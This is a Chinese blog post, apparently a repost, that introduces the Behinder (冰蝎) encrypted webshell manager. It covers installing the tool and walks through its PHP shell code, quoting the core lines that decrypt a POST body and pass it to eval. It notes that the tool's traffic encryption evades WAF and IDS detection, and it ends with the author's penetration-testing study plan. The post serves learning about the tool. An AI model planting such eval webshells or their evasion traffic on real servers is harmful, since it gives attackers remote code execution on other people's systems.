简介和安装
简单介绍
冰蝎是一个动态二进制加密的Webshell管理工具,第一代Webshell管理工具“菜刀”的流量特征非常明显,很容易被安全设备检测到。于是基于流量加密的Webshell越来越多,冰蝎应运而生,也取代了菜刀的地位。
使用Java开发,所以可以跨平台使用。主要功能:基本信息、rce、虚拟终端、文件管理、Sockets代理、反弹shell、数据库管理、自定义代码等。相比菜刀的优点:
- Java开发,支持跨平台运行
- 使用加密隧道传输数据,尽可能避免流量被WAF或IDS设备所捕获
- 更新较为频繁,作者会听取社区的意见修改工具
安装和启动
知识星球搜一下冰蝎,看到关于冰蝎的两篇文章,找到冰蝎的发布地址:
https://github.com/rebeyond/Behinder/releases。
打开冰蝎软件发布地址,下载2021年4月19日发布的Behinder_v3.0 Beta 9.zip。
解压后打开文件夹,看到四个文件。
配置环境:据说冰蝎只支持Jre6-Jre8。
尝试使用Java15版本,发现没有反应。使用Java1.8运行jar文件,启动成功。
查看server文件夹
打开冰蝎的server目录,看到PHP、ASP、ASPX、JSP等shell文件。
查看shell文件的代码,发现都是二十行左右的代码量,默认连接密码都是rebeyond。
代码分析
安全软件的使用某种程度上相当浅显,越来越认识到,安全人才对代码水平的要求甚至比程序员的还要高。虽然开发是一件快乐的事,但还是希望能少掉点头发。
分析shell.php第一遍
使用error_reporting()函数对报错进行设置,关闭错误报告,就把参数设置为0。使用符号@忽略该表达式可能生成的报错信息。
使用session_start()函数启动或重用会话,成功启动会初始化超级变量$_SESSION。
把密钥赋值给变量$_session[‘k’],再使用session_write_close()函数结束当前session,保留session数据。
传参方式采用file_get_contents("php://input"),可以获取请求的原始数据。
(与POST参数方式的区别?有心情了另开一篇文章)
使用extension_loaded('openssl')检查openssl扩展是否加载。
如果没有加载openssl,首先以变量嵌套方式对post数据进行base64解密,然后再加密。
如果加载了openssl,直接使用openssl_decrype()函数,结合key对post数据进行AES解密。
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
使用explode()函数,用 |分隔第一次处理后的post参数。
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
查看软件源码
在Github发布地址上下载source.zip和source.tar.gz文件,使用Bandizip解压文件,
打开之后发现只有一个ReadMe.md文档,GZ压缩包还有一个pax_global_header文件。
看样子冰蝎目前并没有开源。
在ReadMe.md文档中看到了作者写的几篇文章,这个有点意思。
“冰蝎”动态二进制加密网站管理客户端
功能介绍原文链接:
《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799
工作原理原文链接:
《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744
《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758
《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774
反思
编程也好,代码审计也好,做安全都离不开。
不要急。看了一下近来半个月写的文章,与当下的学习路线:
非紧要耗费五天左右:Python爬虫和扫描器、微信内置浏览器漏洞、IP溯源实验。
紧要:子域名和域、MySQL、Redis、Weblogic、Linux权限维持、上线提权3389。SQLMap扫描器、Goby扫描器、Bscan扫描器、Cobalt Strike软件、冰蝎软件等。
当下学习路线:
1.Owasp top10,理论落地,包括部署和挖掘7*10。
2.追洞,常用框架的漏洞复现和利用。
第二阶段:内网渗透。代码审计,钻研某种编程语言,挖0day。
第三阶段:工具开发、重学密码学。逆向分析,二进制漏洞……
短期计划:
黑盒漏洞XSS、CSRF、SSRF、文件上传和webshell免杀、子域名信息收集、文件下载、SQL注入、通用型漏洞追踪和利用。
建立目录收集和字典收集的方式和流程。整理常用的扫描器,可适当分析。
反序列化漏洞的追踪调试、权限提升、越权。
随便看看(有视频):内网主机信息收集、Win域内提权、Win域内横向、后渗透持久化技术。
周计划:
黑盒2点——XSS、文件上传和Webshell免杀、以及提权。部署XSS利用环境、冰蝎哥斯拉。漏洞探测、验证、绕过。
通用型框架漏洞——Weblogic和solor的复现、探测、利用和提权。
转载:https://blog.csdn.net/soldi_er/article/details/116011715